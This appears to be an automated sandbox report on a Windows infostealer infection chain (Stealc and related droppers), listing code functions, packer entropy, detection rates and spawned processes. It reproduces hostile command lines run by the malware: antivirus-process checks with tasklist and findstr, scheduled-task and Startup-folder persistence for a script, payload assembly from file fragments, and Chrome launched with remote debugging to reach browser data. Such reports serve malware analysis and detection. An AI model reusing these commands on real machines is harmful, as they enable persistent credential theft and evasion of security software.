Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C84A7D0 17_2_6C84A7D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8A0700 17_2_6C8A0700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C818090 17_2_6C818090
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8300B0 17_2_6C8300B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FC0B0 17_2_6C8FC0B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8EC000 17_2_6C8EC000
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8E8010 17_2_6C8E8010
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C86E070 17_2_6C86E070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8201E0 17_2_6C8201E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C904130 17_2_6C904130
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C896130 17_2_6C896130
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C888140 17_2_6C888140
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F22A0 17_2_6C8F22A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8EE2B0 17_2_6C8EE2B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9A62C0 17_2_6C9A62C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8EA210 17_2_6C8EA210
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F8220 17_2_6C8F8220
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B8250 17_2_6C8B8250
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8A8260 17_2_6C8A8260
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8523A0 17_2_6C8523A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C87E3B0 17_2_6C87E3B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8743E0 17_2_6C8743E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C892320 17_2_6C892320
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C828340 17_2_6C828340
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C962370 17_2_6C962370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C822370 17_2_6C822370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C93C360 17_2_6C93C360
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B6370 17_2_6C8B6370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C95DCD0 17_2_6C95DCD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8E1CE0 17_2_6C8E1CE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C831C30 17_2_6C831C30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C823C40 17_2_6C823C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C949C40 17_2_6C949C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C813D80 17_2_6C813D80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C969D90 17_2_6C969D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F1DC0 17_2_6C8F1DC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C883D00 17_2_6C883D00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C843EC0 17_2_6C843EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C92DE10 17_2_6C92DE10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C97BE70 17_2_6C97BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9A5E60 17_2_6C9A5E60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C841F90 17_2_6C841F90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C93DFC0 17_2_6C93DFC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9A3FC0 17_2_6C9A3FC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8CBFF0 17_2_6C8CBFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C855F20 17_2_6C855F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C815F30 17_2_6C815F30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C977F20 17_2_6C977F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C82D8E0 17_2_6C82D8E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8538E0 17_2_6C8538E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C97B8F0 17_2_6C97B8F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FF8F0 17_2_6C8FF8F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C87D810 17_2_6C87D810
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C831980 17_2_6C831980
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F1990 17_2_6C8F1990
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B99C0 17_2_6C8B99C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8599D0 17_2_6C8599D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8859F0 17_2_6C8859F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B79F0 17_2_6C8B79F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C96F900 17_2_6C96F900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D5920 17_2_6C8D5920
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C89F960 17_2_6C89F960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8DD960 17_2_6C8DD960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FDAB0 17_2_6C8FDAB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C821AE0 17_2_6C821AE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C85FA10 17_2_6C85FA10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C91DA30 17_2_6C91DA30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9A9A50 17_2_6C9A9A50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C905B90 17_2_6C905B90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C811B80 17_2_6C811B80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C879BA0 17_2_6C879BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8E9BB0 17_2_6C8E9BB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C867BF0 17_2_6C867BF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C86BB20 17_2_6C86BB20
Source: Joe Sandbox View Dropped File: C:\ProgramData\LgAmARwZ\Application.exe 8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: String function: 007745C0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: String function: 6C849B10 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: String function: 6C959F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: String function: 6C87C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: String function: 6C843620 appears 91 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random[1].exe0.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: f55899dae2.exe.13.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Application.exe.33.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9973443886239782
Source: file.exe Static PE information: Section: mahfbdtk ZLIB complexity 0.9942348008385744
Source: axplong.exe.6.dr Static PE information: Section: ZLIB complexity 0.9973443886239782
Source: axplong.exe.6.dr Static PE information: Section: mahfbdtk ZLIB complexity 0.9942348008385744
Source: random[2].exe.13.dr Static PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
Source: c8908bf20d.exe.13.dr Static PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9981081014890282
Source: 2dc588f7b5.exe.13.dr Static PE information: Section: ZLIB complexity 0.9981081014890282
Source: random[1].exe1.13.dr Static PE information: Section: ZLIB complexity 0.9982611677115988
Source: 550b7cfe5f.exe.13.dr Static PE information: Section: ZLIB complexity 0.9982611677115988
Source: GOLD1234[1].exe.13.dr Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: GOLD1234.exe.13.dr Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: shop[1].exe.13.dr Static PE information: Section: .bss ZLIB complexity 1.0003314936926606
Source: shop.exe.13.dr Static PE information: Section: .bss ZLIB complexity 1.0003314936926606
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: Section: ZLIB complexity 0.9982012091280654
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: Section: edfilslq ZLIB complexity 0.9943063624437781
Source: 550b7cfe5f.exe.13.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe1.13.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs Cryptographic APIs: 'CreateDecryptor'
Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@93/82@0/13
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C880300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 17_2_6C880300
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00789600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 17_2_00789600
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00783720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 17_2_00783720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chrome.exe, 0000002B.00000002.2761183199.00002B3C00647000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000011.00000003.1991864231.0000000021219000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000003.2002738966.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000003.2002297977.0000000021234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177217810.0000000003E1A000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2208966431.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2209594821.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2179336471.0000000003DFC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2346026988.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2377327130.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461754759.0000000005855000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"
